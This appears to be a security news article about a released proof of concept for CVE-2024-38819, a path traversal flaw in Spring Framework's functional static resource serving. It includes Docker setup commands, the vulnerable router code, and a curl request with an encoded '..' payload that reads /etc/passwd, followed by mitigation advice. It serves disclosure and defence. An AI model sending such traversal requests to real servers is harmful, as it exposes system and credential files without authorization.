A Proof of Concept (PoC) exploit for the critical path traversal vulnerability identified as CVE-2024-38819 in the Spring Framework has been released, shedding light on a serious security issue affecting applications that serve static resources via functional web frameworks.
This vulnerability allows attackers to access unauthorized files on the server through carefully crafted HTTP requests.
The CVE-2024-38819 vulnerability impacts applications using the Spring Framework’s WebMvc.fn or WebFlux.fn for serving static resources.
Specifically, the issue lies in the improper handling of file paths, which enables attackers to perform directory traversal to access unauthorized files, including sensitive system files such as /etc/passwd
.
Free Webinar on Best Practices for API vulnerability & Penetration Testing: Â Free Registration
Proof of Concept (PoC) Details
The released PoC demonstrates how an attacker can exploit the vulnerability to extract sensitive file contents on a vulnerable server. Below are the steps provided to replicate the exploit.
Steps to Execute PoC
Set Up the Vulnerable Environment
Use Spring Boot 3.3.4, which depends on Spring Framework 6.1.13 (one of the affected versions).
Build a Docker image containing the vulnerable setup using the following command:bash cd vuln docker build -t cve-2024-38819-poc .
Run the Vulnerable Container
Start the container and expose port 8080 to the host machine:bash docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
Execute the Exploit
Run the following curl
command to send a malicious HTTP request that exploits the vulnerability:
bash curl http://localhost:8080/static/link/%2e%2e/etc/passwd
If the vulnerability is present, the contents of the /etc/passwd
file will be displayed, indicating a successful attack.
Technical Explanation
The vulnerability arises from the following setup in the vulnerable application:
Static Resource Routing
The static resources are served using RouterFunctions
and FileSystemResource
in the application.
Example code:
java public RouterFunction<ServerResponse> staticResourceRouter() { return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/")); }
Symbolic Link Exploitation
A symbolic link is created in the Dockerfile to reference a static directory:bash RUN ln -s /static /app/static/link
Payload for Directory Traversal
An attacker can exploit the symbolic link and traverse directories by using percent-encoded paths like:/static/link/%2e%2e/etc/passwd%2e%2e
is the URL-encoded representation of ..
(parent directory), enabling directory traversal.
Mitigation and Recommendations
To mitigate this vulnerability:
- Upgrade to Patched Versions :Spring Framework users should upgrade to non-affected versions once the vulnerability is patched.
- Restrict File Access: Avoid symbolic links for static resources and implement strict validation of file paths.
- Monitor and Patch Systems: Regularly scan and patch vulnerable systems to reduce the risk of exploitation.
Disclaimer
This PoC is released for educational purposes and to raise awareness of the vulnerability. Before testing or utilizing this PoC in any environment, ensure you have proper authorization and the environment is secured. Misusing this PoC may result in legal and ethical repercussions.
This vulnerability appears to be a continuation of similar issues identified in Spring Framework, such as CVE-2024-38816, but involves a different attack vector. Organizations relying on the Spring Framework for critical applications are urged to evaluate and secure their implementations promptly.
Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free